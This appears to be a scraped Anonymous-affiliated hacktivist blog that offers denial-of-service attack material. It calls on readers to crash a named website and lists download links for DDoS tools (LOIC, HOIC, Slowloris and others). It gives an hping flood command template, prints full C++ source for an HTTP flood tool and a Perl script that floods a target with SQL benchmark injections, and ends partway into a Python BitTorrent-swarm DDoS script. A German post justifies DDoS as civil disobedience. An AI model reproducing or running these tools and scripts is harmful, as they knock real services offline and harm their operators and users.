Wikileaks @Facebook: The server for our new Web Doc is struggling with the traffic. Help us make it crash!! http://guerrillapictures.tv/TheEngineer/
****UPDATE****
TANGO DOWN
****UPDATE****
"temporarily unavailable"
Showing posts with label DDos. Show all posts
Showing posts with label DDos. Show all posts
Thursday, October 24, 2013
Tuesday, May 14, 2013
HOIC INFORMATION
Virus Total:
Ikarus: not-a-virus.Hacktool.HOIC
K7AntiVirus: Hacktool
VBA32: Hacktool.DDoSer.2321
McAfee: -
AV: -
"not-a-virus.Hacktool.HOIC"
Additional Information:
SHA256: | 3c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0 |
SHA1: | 0b419c8b9f60cb9cb8957a6dbccb393b5d072e43 |
MD5: | 451c94a23536dcbba422d7612b34b6ff |
File size: | 8.5 MB ( 8902228 bytes ) |
File name: | hoic2.1.exe |
File type: | Win32 EXE |
Tags: | peexe mz |
Detection ratio: | 25 / 46 |
Analysis date: | 2013-05-14 14:47:05 UTC |
Ikarus: not-a-virus.Hacktool.HOIC
K7AntiVirus: Hacktool
VBA32: Hacktool.DDoSer.2321
McAfee: -
AV: -
"not-a-virus.Hacktool.HOIC"
Additional Information:
ssdeep49152:XKgsEyTPOoMjJWPDYtoAoB81BE7nNeHhkD9d5VGokmPh2U69mNGkpETUPSGvVuWs:TsEaQWrYtlKheZmq9ANP61tmf |
TrIDInstallShield setup (29.4%)Win32 EXE PECompact compressed (generic) (28.4%) Win32 Executable MS Visual C++ (generic) (21.3%) Windows Screen Saver (8.9%) Win32 Dynamic Link Library (generic) (4.5%) |
ExifToolSubsystemVersion.........: 4.0 LinkerVersion............: 8.0 ImageVersion.............: 0.0 FileSubtype..............: 0 FileVersionNumber........: 1.0.0.0 UninitializedDataSize....: 0 LanguageCode.............: English (U.S.) FileFlagsMask............: 0x003f CharacterSet.............: Unicode InitializedDataSize......: 679936 FileOS...................: Win32 Country..................: MIMEType.................: application/octet-stream LegalCopyright...........: FileVersion..............: 1.0.0.0 TimeStamp................: 2008:02:06 17:58:42+00:00 FileType.................: Win32 EXE PEType...................: PE32 InternalName.............: FileAccessDate...........: 2013:05:14 15:46:59+01:00 ProductVersion...........: FileDescription..........: Release..................: Development OSVersion................: 4.0 FileCreateDate...........: 2013:05:14 15:46:59+01:00 OriginalFilename.........: hoic.exe Subsystem................: Windows GUI MachineType..............: Intel 386 or later, and compatibles CompanyName..............: CodeSize.................: 1474560 ProductName..............: ProductVersionNumber.....: 1.0.0.0 EntryPoint...............: 0x15582f ObjectFileType...........: Executable application |
Portable Executable structural informationCompilation timedatestamp.....: 2008-02-06 17:58:42 Target machine................: Intel 386 or later processors and compatible processors Entry point address...........: 0x0015582F PE Sections...................: Name Virtual Address Virtual Size Raw Size Entropy MD5 .text 4096 1472181 1474560 6.63 3ed7acfe70b41f6553a6ab207dc3b595 .rdata 1478656 216654 217088 6.10 cbf161d8a00f96c4e1b9e3ed8d194750 .data 1695744 430624 278528 2.09 cd66d1511bb815a3b68d4e63fc5a7c9d .rsrc 2129920 27256 28672 4.30 f0ec48234dc728252789002f974c8652 PE Imports....................: [[COMDLG32.dll]] PrintDlgA, ChooseColorA, GetSaveFileNameW, PageSetupDlgA, GetOpenFileNameW [[VERSION.dll]] VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW [[WINMM.dll]] mciSendStringA, midiOutShortMsg, mciSendStringW, midiOutOpen, midiOutClose [[GDI32.dll]] GetEnhMetaFileA, GetTextMetricsW, SetMapMode, GetSystemPaletteEntries, Polygon, CreateDIBSection, CreatePen, CreateFontIndirectA, GetTextMetricsA, CombineRgn, SetStretchBltMode, DeleteEnhMetaFile, GetPixel, Rectangle, CreateMetaFileW, GetObjectA, ExcludeClipRect, TranslateCharsetInfo, LineTo, DeleteDC, SetDIBitsToDevice, StretchBlt, EndDoc, GetMetaFileA, SelectObject, StartPage, DeleteObject, CreateBitmap, CloseMetaFile, GetFontLanguageInfo, CreateCompatibleBitmap, RealizePalette, SetTextColor, CreatePatternBrush, GetDeviceCaps, CreateEnhMetaFileW, BitBlt, SetAbortProc, CreateDCA, EnumFontsW, CreateICA, MoveToEx, CreatePalette, EnumFontFamiliesExW, CreateDIBitmap, SetViewportOrgEx, SelectPalette, GetDIBits, SetTextAlign, SelectClipRgn, RoundRect, CreateFontW, SetBkMode, StretchDIBits, CloseEnhMetaFile, SetBrushOrgEx, EndPage, CreateRectRgn, GetClipRgn, StartDocA, DeleteMetaFile, EnumEnhMetaFile, GetEnhMetaFileHeader, CreateBrushIndirect, CreateSolidBrush, SetViewportExtEx, GetStockObject, SetPixelV, SetWindowExtEx, GetTextExtentPoint32W, Ellipse, CreateCompatibleDC [[SHELL32.dll]] DragQueryFileW, SHBrowseForFolderW, DragAcceptFiles, SHFileOperationW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetDesktopFolder, Shell_NotifyIconW, SHGetMalloc, DragFinish [[KERNEL32.dll]] GetStdHandle, GetConsoleOutputCP, FileTimeToSystemTime, GetOverlappedResult, WaitForSingleObject, HeapDestroy, GetFileAttributesW, GetLocalTime, FreeEnvironmentStringsA, DeleteCriticalSection, GetCurrentProcess, CompareFileTime, GetConsoleMode, GetLocaleInfoA, _llseek, GetLogicalDrives, FreeEnvironmentStringsW, SetCommTimeouts, GetLocaleInfoW, SetStdHandle, GetCommModemStatus, IsDBCSLeadByteEx, WideCharToMultiByte, GetStringTypeA, WriteFile, _lopen, GetSystemTimeAsFileTime, HeapReAlloc, GetStringTypeW, FreeLibrary, GetTimeZoneInformation, LoadResource, GetLogicalDriveStringsW, FindClose, TlsGetValue, MoveFileW, SetFileAttributesW, GetStringTypeExA, GetEnvironmentVariableW, SetLastError, GetSystemTime, InitializeCriticalSection, CopyFileW, GetUserDefaultLangID, OutputDebugStringW, RemoveDirectoryW, IsDebuggerPresent, HeapAlloc, GetVersionExA, GetModuleFileNameA, QueryPerformanceFrequency, GetUserDefaultLCID, SetHandleCount, UnhandledExceptionFilter, InterlockedDecrement, MultiByteToWideChar, SetFilePointer, _lclose, SetEnvironmentVariableW, GetSystemDirectoryW, SetUnhandledExceptionFilter, MulDiv, ClearCommError, GetSystemDirectoryA, TerminateProcess, WriteConsoleA, SetCurrentDirectoryW, GetCommState, LocalFileTimeToFileTime, SetEndOfFile, GetCurrentThreadId, LeaveCriticalSection, WriteConsoleW, HeapFree, EnterCriticalSection, SetCommBreak, LoadLibraryW, GetOEMCP, QueryPerformanceCounter, GetTickCount, TlsAlloc, VirtualProtect, FlushFileBuffers, LoadLibraryA, RtlUnwind, GlobalSize, GetStartupInfoA, GetDateFormatA, GetWindowsDirectoryW, GetFileSize, GetModuleHandleW, GetCommProperties, CreateDirectoryW, DeleteFileW, GlobalLock, _lread, GetProcessHeap, GetTempFileNameW, CompareStringW, GlobalReAlloc, GetModuleFileNameW, ExpandEnvironmentStringsW, FindNextFileW, GlobalFree, lstrcpyA, ResetEvent, FindFirstFileW, GetProcAddress, EscapeCommFunction, CreateEventW, SetCommState, CreateFileW, CreateEventA, GetFileType, TlsSetValue, CreateFileA, ExitProcess, InterlockedIncrement, GetLastError, SystemTimeToFileTime, LCMapStringW, GetShortPathNameW, GetFileTime, GetConsoleCP, LCMapStringA, GetEnvironmentStringsW, GlobalUnlock, GlobalAlloc, FileTimeToLocalFileTime, GetEnvironmentStrings, GetCurrentDirectoryW, GetCurrentProcessId, LockResource, SetFileTime, GetCommandLineW, GetCPInfo, ClearCommBreak, HeapSize, GetCommandLineA, GetCurrentThread, RaiseException, CompareStringA, TlsFree, GetModuleHandleA, ReadFile, CloseHandle, GetACP, GetVersion, GetLongPathNameW, IsValidCodePage, HeapCreate, GetTempPathW, VirtualFree, Sleep, IsBadReadPtr, FindResourceA, VirtualAlloc, GetTimeFormatA [[OLEAUT32.dll]] Ord(419), Ord(424), Ord(6), Ord(2) [[IPHLPAPI.DLL]] GetAdaptersInfo [[ADVAPI32.dll]] RegCreateKeyExW, RegCloseKey, AccessCheck, RegDeleteKeyW, RegQueryValueExW, GetFileSecurityW, RegisterEventSourceW, DeregisterEventSource, RegOpenKeyExW, ImpersonateSelf, SetServiceStatus, RegQueryInfoKeyW, RegDeleteValueW, RegEnumKeyExW, OpenThreadToken, RegisterServiceCtrlHandlerA, MapGenericMask, RegEnumValueW, RevertToSelf, StartServiceCtrlDispatcherA, RegSetValueExW, ReportEventW [[ole32.dll]] OleUninitialize, CoUninitialize, CoInitialize, OleInitialize, CoCreateInstance, CLSIDFromString, RegisterDragDrop, CLSIDFromProgID, DoDragDrop, RevokeDragDrop, CoTaskMemAlloc, CoTaskMemFree, CoGetClassObject [[USER32.dll]] RedrawWindow, GetMessagePos, CharLowerBuffA, DestroyMenu, GetForegroundWindow, SetWindowPos, DispatchMessageA, EndPaint, VkKeyScanA, CharUpperBuffA, WindowFromPoint, DrawIcon, GetMessageTime, SetMenuItemInfoW, DispatchMessageW, GetCursorPos, ChildWindowFromPointEx, GetMenuStringW, GetMenu, IsClipboardFormatAvailable, SendMessageA, GetClassInfoW, DefMDIChildProcW, DrawTextW, SetScrollPos, GetWindowTextLengthA, GetSysColor, ClientToScreen, GetActiveWindow, ShowCursor, GetWindowTextW, LoadImageA, GetTopWindow, InvalidateRgn, GetMenuItemID, DestroyWindow, DrawEdge, GetParent, UpdateWindow, SetPropA, EnumWindows, GetMenuState, GetMessageW, ShowWindow, GetPropA, EnumDisplayMonitors, PeekMessageW, TranslateMDISysAccel, EnableWindow, PeekMessageA, TranslateMessage, GetAsyncKeyState, GetWindow, RegisterClassW, CreateCursor, GetIconInfo, SetParent, SetClipboardData, ScrollWindow, IsZoomed, SetWindowLongW, DrawMenuBar, EnableMenuItem, InvertRect, WindowFromDC, GetWindowLongA, CreateWindowExA, FillRect, CopyRect, GetSysColorBrush, CreateWindowExW, CreateMenu, GetMenuItemInfoW, DragDetect, SetFocus, MapVirtualKeyA, PostMessageA, BeginPaint, OffsetRect, DefWindowProcW, GetScrollPos, KillTimer, GetMonitorInfoA, RegisterWindowMessageA, DefWindowProcA, DrawFocusRect, GetClipboardData, GetSystemMetrics, IsIconic, SetScrollRange, GetWindowRect, InflateRect, RegisterClassA, SetCapture, ReleaseCapture, EnumChildWindows, SetWindowLongA, InvalidateRect, RemovePropA, CreatePopupMenu, CheckMenuItem, GetSubMenu, DrawIconEx, SetWindowTextW, SetTimer, BringWindowToTop, FindWindowW, ScreenToClient, LoadCursorA, LoadIconA, TrackPopupMenu, GetMenuItemCount, CreateIconFromResourceEx, CreateIconFromResource, GetSystemMenu, GetDC, InsertMenuW, SetForegroundWindow, OpenClipboard, EmptyClipboard, ReleaseDC, GetScrollRange, GetScrollInfo, CreateIconIndirect, MessageBeep, MessageBoxW, SendMessageW, DrawFrameControl, SetMenu, RegisterClipboardFormatA, MoveWindow, MessageBoxA, GetWindowDC, DestroyCursor, LoadCursorFromFileW, MsgWaitForMultipleObjectsEx, SetScrollInfo, GetKeyState, SystemParametersInfoA, GetDoubleClickTime, DestroyIcon, CreateMDIWindowW, GetWindowLongW, DefFrameProcW, IsWindowVisible, FrameRect, SetRect, DeleteMenu, GetKeyNameTextW, wsprintfA, CallWindowProcW, AdjustWindowRect, GetClientRect, ValidateRect, GetClassNameA, GetFocus, CloseClipboard, SetCursor [[COMCTL32.dll]] ImageList_Create, Ord(17), InitCommonControlsEx, ImageList_Destroy, ImageList_Add PE Resources..................: Resource type Number of resources RT_ICON 6 RT_GROUP_CURSOR 3 RT_CURSOR 3 RT_MANIFEST 1 PICKLE 1 RT_VERSION 1 RT_GROUP_ICON 1 Resource language Number of resources ENGLISH US 16 |
ClamAV PUA EnginePossibly Unwanted Application. While not necessarily malicious, the scanned file presents certain characteristics which depending on the user policies and environment may or may not represent a threat. For full details see: http://www.clamav.net/index.php?s=pua&lang=en . |
First seen by VirusTotal2010-12-10 07:32:17 UTC ( 2 years, 5 months ago ) |
Last seen by VirusTotal2013-05-14 14:47:05 UTC ( 2 minutes ago ) |
File names (max. 25)
|
DDOS TOOL LIST FROM ANONYMOUS 2.0
LOIC
Download: http://adf.ly/TWxyq
Info: http://xenonymous.blogspot.de/2013/05/loic-information.html
HOIC
Download: http://adf.ly/TWy8E *coming soon*
Info: http://xenonymous.blogspot.de/2013/05/hoic-information.html
Another Links:
Not Official
HOIC-Download
http://adf.ly/TWyD3
Pentbox
Download: http://adf.ly/TWyHf
Slowloris
Usage & DL Mirrors: http://adf.ly/TWyMM
Download links here http://adf.ly/TWyTq
r-u-dead-yet?
Download : http://adf.ly/TWyYh
hping2
Download: http://adf.ly/TWydm
hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
4 moar options take a look @ http://pastebin.com/uM1MjN4b
for advanced users:
http://www.thc.org/thc-ssl-dos/
Visit me on Facebook:https://www.facebook.com/pages/Anonymous-Blog-by-Xenonymous/395615810514296
Old:
DDoS Tool List From Anonymous
DDOS TOOLS LIST!
DDoSim (Linux) - Download => http://adf.ly/TWymG
DDoSim (Linux) - Download => http://adf.ly/TWymG
Loris - Download => http://adf.ly/TWytV
Apachekiller - Download =>
http://pastebin.com/9y9Atijn save as "whatever.pl" <-- More
Info http://thehackernews.com/2011/08/killapache-ddos-tool-half-of-internet.html
perl for windows => http://www.activestate.com/activeperl/downloads
pyloris => http://sourceforge.net/projects/pyloris/ | instructions =>http://pastebin.com/MTyHYXJe/hping
=> http://www.hping.org/download.php | Instructions =>
Tor's Hammer => http://adf.ly/TWyzi
LOIC: http://adf.ly/TWz5x
Visit me on Facebook:https://www.facebook.com/pages/Anonymous-Blog-by-Xenonymous/395615810514296
Sunday, May 12, 2013
LOIC INFORMATION
SourceForge:
Low Orbit Ion Cannon.
The project just keeps and maintenances (bug fixing) the code written by the original author - Praetox, but is not associated or related with it.
DISCLAIMER: USE ON YOUR OWN RISK. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER OR CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.
Virus Total:
Low Orbit Ion Cannon.
The project just keeps and maintenances (bug fixing) the code written by the original author - Praetox, but is not associated or related with it.
DISCLAIMER: USE ON YOUR OWN RISK. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER OR CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.
RESULT: HackTool.MSIL.Loic.de (Not a Virus)
Virus Total:
SHA256: | 1b26fcf0da549a47dceefb4e99fd520d63dec3a7cd539d3edcf1d7c1d4a95fd5 |
SHA1: | 26ef60c870017ebc85901fb2fbce740b82032eb1 |
MD5: | b596e7cacbad1e814b0cd053086c4900 |
File size: | 132.0 KB ( 135168 bytes ) |
File name: | LOIC.exe |
File type: | Win32 EXE |
Tags: | peexe assembly mz |
Detection ratio: | 36 / 46 |
Analysis date: | 2013-05-12 16:34:34 UTC |
1536:g9hnd0LAv8k8h/OseMoZKAGRANEiNn8tW6zon4vW48N4Q+X/TsLLbyXPnDlzuZe0:KiLnkqtBoZ9B8ccW48kLcpZi4Vdf
|
TrIDGeneric CIL Executable (.NET, Mono, etc.) (81.0%)Win32 Dynamic Link Library (generic) (7.2%) Win32 Executable (generic) (7.2%) Generic Win/DOS Executable (2.2%) DOS Executable Generic (2.2%) |
ExifToolFileDescription..........: Low Orbit Ion Cannon Comments.................: TCP/IP stress-test tool LinkerVersion............: 8.0 ImageVersion.............: 0.0 ProductName..............: Low Orbit Ion Cannon FileVersionNumber........: 1.0.7.0 LanguageCode.............: Neutral FileFlagsMask............: 0x003f CharacterSet.............: Unicode InitializedDataSize......: 19968 OriginalFilename.........: LOIC.exe MIMEType.................: application/octet-stream Subsystem................: Windows GUI FileVersion..............: 1.0.7.0 TimeStamp................: 2012:01:29 10:04:31+00:00 FileType.................: Win32 EXE PEType...................: PE32 InternalName.............: LOIC.exe SubsystemVersion.........: 4.0 FileAccessDate...........: 2013:05:12 17:34:13+01:00 ProductVersion...........: 1.0.7.0 UninitializedDataSize....: 0 OSVersion................: 4.0 FileCreateDate...........: 2013:05:12 17:34:13+01:00 FileOS...................: Win32 LegalCopyright...........: Public domain MachineType..............: Intel 386 or later, and compatibles CodeSize.................: 114688 FileSubtype..............: 0 ProductVersionNumber.....: 1.0.7.0 EntryPoint...............: 0x1de7e ObjectFileType...........: Executable application AssemblyVersion..........: 1.0.7.0 |
Sigcheckproduct..................: Low Orbit Ion Cannon description..............: Low Orbit Ion Cannon file version.............: 1.0.7.0 original name............: LOIC.exe strong name..............: Signed comments.................: TCP/IP stress-test tool version..................: 1.0.7.0 internal name............: LOIC.exe copyright................: Public domain link date................: 11:04 AM 1/29/2012 |
Portable Executable structural informationCompilation timedatestamp.....: 2012-01-29 10:04:31 Target machine................: Intel 386 or later processors and compatible processors Entry point address...........: 0x0001DE7E PE Sections...................: Name Virtual Address Virtual Size Raw Size Entropy MD5 .text 8192 114308 114688 7.59 0d080ec0ea8cc25e0170d587dd63ac47 .rsrc 122880 19264 19456 6.52 f21a95feec6e9209f5fc1cbccc1ed6f6 .reloc 147456 12 512 0.10 825a5e453d530acd3dbd4031046c9db5 PE Imports....................: [[mscoree.dll]] _CorExeMain PE Resources..................: Resource type Number of resources RT_ICON 4 RT_GROUP_ICON 1 RT_VERSION 1 RT_MANIFEST 1 Resource language Number of resources NEUTRAL 7 |
ClamAV PUA EnginePossibly Unwanted Application. While not necessarily malicious, the scanned file presents certain characteristics which depending on the user policies and environment may or may not represent a threat. For full details see: http://www.clamav.net/index.php?s=pua&lang=en . |
First seen by VirusTotal2012-01-29 16:25:46 UTC ( 1 year, 3 months ago ) |
Last seen by VirusTotal2013-05-12 16:34:34 UTC ( 6 minutes ago ) |
File names (max. 25)
|
Tuesday, December 11, 2012
Anonymous erklärt Ddos (GERMAN)
Prinzipiell lässt sich eine DDoS-Attacke jedoch treffender mit einer Sitzblockade vergleichen. Daher sollte man sie auch dementsprechend beurteilen. Ketten sich Umweltaktivisten an Gleise, so muss der CASTOR-Transport gestoppt werden. Technisch gesehen trifft dies auch auf DDoS-Attacken zu, da man gezielt mit sinnlosen Anfragen die Server überlastet und somit deren Transport von Informationen stoppt. Diese Attacken richten keinen physischen Schaden an, sondern sollen lediglich den Betrieb der Webpräsenzen für den Zeitraum der DDos-Attacke einschränken.
Sitzblockaden kann man mit Hilfe der Polizei auflösen, auch wenn diese etwas Zeit dafür benötigt. Ähnlich kann man auch DDoS-Attacken mit Hilfe von Aktualisierungen bzw. Neuinstallation von entsprechenden PlugIn's oder der Optimierung der Firewall- und Servereinstellungen auflösen.
Desweiteren ist zu berücksichtigen, dass ein Demonstrant, der sich an einer Sitzblockade beteiligt, nicht danach gefragt wird wodurch sein Handeln legitimiert wird, obwohl sein Verhalten den Tatbestand der Nötigung entspricht. Wir sehen darin einen eklatanten Widerspruch.
Anonymous möchte mit diesen virtuellen Sitzblockaden seinen zivilen Widerstand gegen bestimmte Konzerne, Großunternehmen oder Teile der Regierung zum Ausdruck bringen.
Ziel waren, sind und werden nie Unbeteiligte sein. Sei es in Form eines direkten Angriffes oder durch Folgen, die dadurch entstehen.
Vergangene Angriffe, wie zum Beispiel auf das PlayStation Network haben lediglich deren Webpräsenz geschadet. Die entwendeten Userdaten wurden von anderen Gruppen, welche unter Mitwissen von Sony schon über einen Monat sich an deren Datenbank versucht haben, ergattert. Sony hat nichts dagegen unternommen. Medien haben daraufhin fälschlicherweise Anonymous als Sündenbock dargestellt. Ähnlich, wie bei Servergate, als man versuchte Anonymous als terroristische Organisation darzustellen, welche gezielt Atomkraftwerke übernehmen wollte - was nebenbei erwähnt mit einfachen DDoS auf deren Webpräsenz unmöglich ist. Leider geben diese Medien stark verfälschte Inhalte wieder. Derartige Reaktionen entstehen aus mangelnder Sachkompetenz der Redakteure oder - wahrscheinlich - mit der Intention der Auflagensteigerung durch Verunsicherung und Angstschürung durch Desinformation.
Wieso diese harten Strafen? Wir fordern DDoS-Attacken als virtuelle Sitzblockade im Sinne des zivilen Ungehorsams anzuerkennen und angemessenere Reaktionen folgen zu lassen.
Thursday, December 6, 2012
Anonymous Blog by Xenonymous Hit List
02# *UPDATED* Mass defaced/HACKED #GazaUnderAttack 67 Hits
05# Hulk DDOS Tool (Python) 32 Hits
09#Anonymous - Message To The State Of Israel 24 Hits
Wednesday, November 28, 2012
[C++][Source] Scl-DDoS (Simple CLI DDoSer) [Well-Commented code!][Windows]
#######################http://pastebin.com/zHd0YqRL#####################
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <signal.h>
#define MAXRETRIES 3//Set max retries
#define BUFFSIZE 256//Set buffer size
//http header
const char * szHeader =
"GET / HTTP/1.1\r\n"
"Accept: text/html\r\n"
"Accept-Language: *\r\n"
"User-Agent: Mozilla/5.0\r\n"
"Accept-Encoding:\r\n"
"Connection: Keep-Alive\r\n"
"Host: "; //Hostname/ip is appended later
void terminate(int nParam) //Terminate function
{
printf("Cleaning up...\n");
WSACleanup(); //Cleanup
printf("Finished!\n");
exit(0); //Exit the program
}
void usage() //Displays usage
{
printf("Usage: [IP/HOSTNAME] [PORT] [MAX-TIMEOUT]\n"
"Arg 1 must be a valid IPv4-address or hostname! (ex. 192.168.0.100 / www.google.com)\n"
"PORT must be a valid positive integer! (ex. 80)\n"
"MAX-TIMEOUT(timeout defined in msec) must be a valid positive integer!\n");
return;
}
int main(int argc,char *argv[]) //Main function
{
//**
// Check arguments *
//**
if (argc != 4) //Check to see if there are 3 arguments...
{
usage(); //If not, then display usage,
exit(1);//then exit...
}
//Check if both argument 2 and 3 is valid positive integers
if (!(atoi(argv[2])>0)||!(atoi(argv[3])>0))
{
usage();//If not, then display usage,
exit(1);//then exit...
}
//**
//**
// Initialize *
//**
void (*termsign)(int); //Termination signal handle
termsign = signal (SIGINT,terminate); //Set-up signal from SIGNINT(Interrupt) to terminate
if (termsign == SIG_ERR) //If signal set-up failed, then quit...
{
printf("Cannot set-up signals!\nQuitting...\n");
exit(1);//Exit...
}
WSADATA wsaData; //Instance of wsaData
int nRes = WSAStartup(MAKEWORD(2,2), &wsaData); //Check version and start winsock2
if (nRes != NO_ERROR) //Check if winsock had any errors...
{
printf("WSAStartup failed!\n");
exit(1); //Exit
}
//**
//**
// Get/set host IP *
//**
sockaddr_in cAddress; //Create instance sockaddr_in to define target host address
printf("Challenging as IP...\n");
cAddress.sin_addr.s_addr = inet_addr(argv[1]); //Set ip, if arg 1 is IP
if (cAddress.sin_addr.s_addr!=-1) //If IP != -1
printf("Using IP %s\n",inet_ntoa(cAddress.sin_addr)); //Use IP
else
{
printf("Challenging as hostname...\n");
hostent* addr = gethostbyname(argv[1]); //Resolve hostname of url
if (addr!=NULL) //If hostname is resolvable
cAddress.sin_addr = (*(in_addr *)*addr->h_addr_list); //Then get the first IP of url
else
{
printf("Couldn't resolve hostname!\n");
exit(0); //Exit...
}
}
printf("Using IP from hostname: %s\n",inet_ntoa(cAddress.sin_addr));
cAddress.sin_family = AF_INET; //Set address type
cAddress.sin_port = htons(atoi(argv[2])); //Set address
//**
//**
// Create HTTP Packet *
//**
int nBytesOut = NULL; //Holds number of bytes sent
int nBytesIn = NULL; //Holds number of bytes recieved
char szBufferOut[BUFFSIZE]; //Out buffer
char szBufferIn[BUFFSIZE]; //In buffer
for(int i=0;i<BUFFSIZE;szBufferOut[i++]='\0'); //Zero memory for szBufferOut
for(int i=0;i<BUFFSIZE;szBufferIn[i++]='\0'); //Zero memory for szBufferIn
for(int i=0;szHeader[i]!='\0';szBufferOut[i]=szHeader[i],i++); //Copy header to outBuffer
nBytesOut = (int)strlen(szBufferOut); //Get length of out-buffer so far
for(int i=0;argv[1][i]!='\0';szBufferOut[nBytesOut+i]=argv[1][i],i++); //Add host address to header
char szEndToken[4] = {'\r','\n','\r','\n'}; //End-token (CR,LF,CR,LF)
nBytesOut = (int)strlen(szBufferOut); //Get length of out-buffer so far, again
for(int i=0;i<(int)strlen(szEndToken);szBufferOut[nBytesOut+i]=szEndToken[i],i++); //Add CR LF CR LF
printf("Out packet:\n\n%s\n\n",szBufferOut);
//**
//**
// Main loop *
//**
while(1) //Loop until interrupted
{
SOCKET cSocket; //Declare instance of SOCKET
cSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); //Set-up socket
if (cSocket == INVALID_SOCKET) //Check if socket was created successfully
{
printf("Socket creation failed! Error#:%d\n", WSAGetLastError());
terminate(0); //Clean up, and quit...
}
//Try to connect to server...
if (connect(cSocket,(SOCKADDR*)&cAddress,sizeof(cAddress)) == SOCKET_ERROR)
{
printf("Connection failed!\n");
Sleep(atoi(argv[3]));
continue; //Try again...
}
(void)send(cSocket, szBufferOut, strlen(szBufferOut), 0); //Send packet
nBytesIn = NULL;
while(nBytesIn == 0) //Wait for response
{
nBytesIn = recv(cSocket, szBufferIn, BUFFSIZE-1, 0); //Get reply, if any...
//If response is empty, or connection times out, then try again...
if (nBytesIn <= 0 || nBytesIn == WSAECONNRESET)
{
printf("Host unavailable!\n");
Sleep(atoi(argv[3]));
nBytesIn = -1; //Will trigger loop restart *
break;
}
if (nBytesIn <= 0) //Check if pack has a size > than 0
{
nBytesIn = -1; //Will trigger loop restart *
break;
}
//See if reply is valid
char szValidReply[12] = {'H','T','T','P','/','1','.','1',' ','2','0','0'};
int ok = 0;
for(int i=0;i<12;i++) //Compare chars...
if (szValidReply[i]!=szBufferIn[i])
{
ok = 1; //This is triggered if char's are different!
break;
}
if (ok!=0) //Check to see if they compared alright...
{
printf("Invalid reply!\nReply:\n--\n\n%s\n",szBufferIn);
terminate(0);
}
}
if (nBytesIn == -1) //If nBytesIn is set to -1,
continue; //then retry connection... *
printf("Reply[0-256]: \n\n%s\n\n\n",szBufferIn);
for(int i=0;i<BUFFSIZE;szBufferIn[i++]='\0'); //Zero memory for szBufferIn
closesocket(cSocket); //Close socket
Sleep(atoi(argv[3]));
}
//**
terminate(0);
}
Tuesday, November 13, 2012
#REFREF
#!usr/bin/perl
#RefRef
#@by_Xenonymous
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70 726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
sub sintax {
print "\n[+] Sintax : $0 \n";
}
sub toma {
return $nave->get($_[0]);
}
# ¿ The End ?
ANONYMOUS: Message to pedophiles
Loic http://www.mediafire.com/?4exm4kghdcz316u
Hoic V2.1 http://www.mediafire.com/?ddp9d5znwmgsasr
Turbinas V1.0 http://www.mediafire.com/?wo4sh527nf7wais
Slowloris http://www.mediafire.com/?6wbee516qfx6zok
SYN Flood DOS http://www.mediafire.com/?ja4x2odlxn7xcq3
TUNEL:http://www.securitykiss.com/resources/download/windows/
HOTSPOT SHIELD: http://hotspot-shield.softonic.com/
ULTRA VPN: http://ultravpn.softonic.com/
CYBERGHOST: http://cyberghost-classic-vpn.softonic.com/
Tunnelbear 1.0: http://tunnelbear.softonic.com/
http://pastebin.com/bhMsSt3R
Sunday, November 4, 2012
SwarmDos.py
#!/usr/bin/env python2.7
#
# bitDDoS.py
#
# Bittorrent Swarm ``DDoS Tool''
# Injects target machine into large bittorent swarms
#
# no fucking idea if this works or not
#
from urllib import urlencode, unquote
from urlparse import parse_qs
import random, time, socket, threading, traceback, binascii, copy
import requests # http://pypi.python.org/pypi/requests/0.14.1
import hunnyb # http://pypi.python.org/pypi/HunnyB/0.1.0
from bs4 import BeautifulSoup as BS # http://pypi.python.org/pypi/beautifulsoup4/4.1.3
class locking_dict:
def __init__(self):
self.data = dict()
self._alock = threading.Lock()
def __setitem__(self,k,v):
self._alock.acquire()
r = self.data[k]=v
self._alock.release()
def __getitem__(self,k):
self._alock.acquire()
r = None
try:
r = self.data[k]
except:
pass
self._alock.release()
return r
def __delitem__(self,k):
self._alock.acquire()
try:
del self.data[k]
except:
pass
self._alock.release()
def __contains__(self,i):
r = self.data.__contains__(i)
return r
def __len__(self):
r = len(self.data)
return r
def __iter__(self):
r = self.data.__iter__()
return r
def __index__(self,i):
r = self.data.__index__(i)
return r
def keys(self):
r = self.data.keys()
return r
def _announce(ctx):
"""
announce to trackers many "fake" seeds for many different torrents
"""
qs = {
'port':ctx['port'],
'uploaded' : 0,
'downloaded' : 0,
'left':0,
'event':'completed',
}
try:
